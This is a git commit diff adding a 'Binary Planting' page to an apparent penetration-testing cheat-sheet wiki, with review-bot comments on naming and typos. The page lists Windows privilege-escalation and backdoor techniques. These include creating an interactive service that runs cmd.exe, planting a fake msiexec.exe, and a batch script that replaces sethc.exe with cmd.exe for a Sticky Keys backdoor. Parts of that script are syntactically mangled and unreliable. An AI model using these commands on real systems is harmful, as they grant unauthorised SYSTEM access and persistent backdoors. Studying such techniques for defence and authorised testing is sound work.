Commit 5348f45

Added content for Binary Planting from Doku
1 parent 22f1032 commit 5348f45

2 files changed

+12
-0
lines changed

navigation.md

+1
@@ -5,6 +5,7 @@
55
[Windows]()
66

77
* [Autostart Locations](windows/autostart.md)
8+
* [Binary Planting](windows/binary.md)
89
* [CMD Commands](windows/cmd.md)
910
* [Files - Blind](windows/blind.md)
1011
* [Files - Finding](windows/find_files.md)
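
Review bot: the link target `windows/binary.md` on the added line is ambiguous on its own, since the file name drops "Planting" from the page title. Consider naming the file `windows/binary_planting.md`, in the same style as `find_files.md`, so the path is self-describing. The alphabetical position between Autostart Locations and CMD Commands is right.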

windows/binary.md

+11
@@ -0,0 +1,11 @@
1+
# Windows Binary Planting
2+
3+
Binary Planting is essentially putting binary is a specific place, be it moved, copied or uploaded to create the desired effect. In this section we'll be going over the use of binary planting to escalate privileges.
4+
5+
| Command | Description / Importance |
6+
| ------- | ------------------------ |
7+
| `%SystemRoot%\System32\wbem\mof\` | Taken from Stuxnet: http://blogs.iss.net/archive/papers/ibm-xforce-an-inside-look-at-stuxnet.pdf Look for Print spooler vulnerability. |
8+
| `echo $PATH` | Check the $PATH environmental variable. Some directories may be writable. See: https://www.htbridge.com/advisory/HTB23108 |
9+
| `msiexec.exe` | Idea taken from here: http://goo.gl/E3LTa - basically put evil binary named msiexec.exe in Downloads directory and when a installer calles msiexec without specifying path you get code execution. |
10+
| `sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys` | Create malicious services. |
11+
|<code>Replacing file as: sethc.exe<br>@echo off <br>c: > nul\\cd\ > nul\\cd %SYSTEMROOT%\System32\ > nul <br>if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul <br>cmd %SYSTEMROOT%\System32\cmdsys\ > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul <br>copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul <br>copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul <br>copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul<br>exit</code> | By doing this, you just have to press the sticky key activation key. From Wikipedia.org: To enable this shortcut, the ?Shift key must be pressed 5 times in short succession. This feature can also be turned on and off via the Accessibility icon in the Windows Control Panel. To turn off once enabled, just simply press 3 or more of the Sticky Keys (Ctrl, Alt, Shift, Windows Button) at the same time. |
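
Review bot: the `echo $PATH` row (new line 8) uses POSIX shell syntax on a Windows page; in cmd.exe that echoes the literal string, so the check should read `echo %PATH%`. The "Command" column header also does not fit new lines 7 and 9, which hold a directory and a file name rather than commands; "Command / Location" would be accurate. Smaller points: "putting binary is a specific place" should read "putting a binary in a specific place", "calles" should be "calls", "?Shift" in the last row carries an encoding artifact, and the `goo.gl` short link should be replaced by its full target URL so the source stays identifiable. The rows also say what to run but not what each one assumes; a short note per row on the privilege or write access required would make the table usable for hardening review as well.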
